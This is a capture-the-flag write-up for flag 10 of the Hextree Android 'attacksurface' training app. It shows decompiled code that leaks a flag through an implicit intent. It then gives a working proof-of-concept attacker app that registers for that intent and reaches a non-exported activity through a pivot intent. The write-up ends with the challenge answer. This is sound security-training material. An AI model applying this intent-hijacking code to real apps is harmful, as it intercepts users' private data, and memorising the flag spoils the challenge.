Static Analysis
AndroidManifest.xml
Upon inspecting the Flag10Activity in the AndroidManifset.xml file we see the following
<activity
android:name="io.hextree.attacksurface.activities.Flag10Activity"
android:exported="false"/>Since exported is set to false we can’t call this activity from our exploit apk, but as we saw in Flag5Activity we can use it to be our pivot activity
Flag10Activity Class
public class Flag10Activity extends AppCompactActivity {
public Flag10Activity() {
this.name = "Flag 10 - Hijack implicit intent with the flag";
this.tag = "ImplicitIntent";
this.tagColor = R.color.red;
this.flag = "qq51kWPLVous73Vn3R6HuU1897f/Nq8tGvdjpJ7GQRW9/s9oCLN5lr9hjvVIHyUf";
}
@Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
protected void onCreate(Bundle bundle) {
super.onCreate(bundle);
this.f = new LogHelper(this);
if (getIntent().getAction() == null) {
Toast.makeText(this, "Sending implicit intent with the flag\nio.hextree.attacksurface.ATTACK_ME", 1).show();
Intent intent = new Intent("io.hextree.attacksurface.ATTACK_ME");
intent.addFlags(8);
this.f.addTag(intent);
intent.putExtra("flag", this.f.appendLog(this.flag));
try {
startActivity(intent);
success(this);
} catch (RuntimeException e) {
e.printStackTrace();
Toast.makeText(this, "No app found to handle the intent\nio.hextree.attacksurface.ATTACK_ME", 1).show();
finish();
}
}
}
}Upon reviewing the code we see that when this class is called it sends an implicit intent to with io.hextree.attacksurface.ATTACK_ME action and if it found an activity that can handle that action it will print the flag, So we just need to create a class to recieve that intent :)
Creating POC
AndroidManifest.xml
The first thing we want to do is the set the exported option to true so other apps can call this activity
Secondly we need to make this acitivity a default reciever for the io.hextree.attacksurface.ATTACK_ME action so when the target fires an implicit intent with this action it goes to our activity
<activity
android:name=".Flag10"
android:exported="true">
<intent-filter>
<action android:name="io.hextree.attacksurface.ATTACK_ME" />
<category android:name="android.intent.category.DEFAULT" />
</intent-filter>
</activity>Flag10.java
Now we create an activity that recieves the intent and prints the extra called flag
We also used the pivot utility that uses Flag5Activity as a pivot so we can call Flag10Activity as it’s not exported so we can’t call it directly
public class Flag10 extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_flag10);
getSupportActionBar().setTitle("Flag 10");
Button button = findViewById(R.id.button_flag10);
button.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
Log.v("Flag 10 - Debug", "Going to flag 10 activity");
// 1. Create the final destination intent
Intent targetIntent = new Intent();
targetIntent.setComponent(new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag10Activity"));
// 2. Use the PivotIntent utility to create the wrapped intent
Intent pivot = PivotIntent.create(targetIntent);
// 3. Start the activity
startActivity(pivot);
}
});
// Check if the extras if the recieved intent is not empty
// If it's not empty print the `flag` extra
if(getIntent().getExtras() != null) {
Intent recievedIntent = getIntent();
Utils.showDialog(Flag10.this, recievedIntent);
Log.v("Flag10 - Flag", String.valueOf(recievedIntent.getStringExtra("flag")));
}
}
}Flag
HXT{hijacked-intent-with-flag-dsui2908}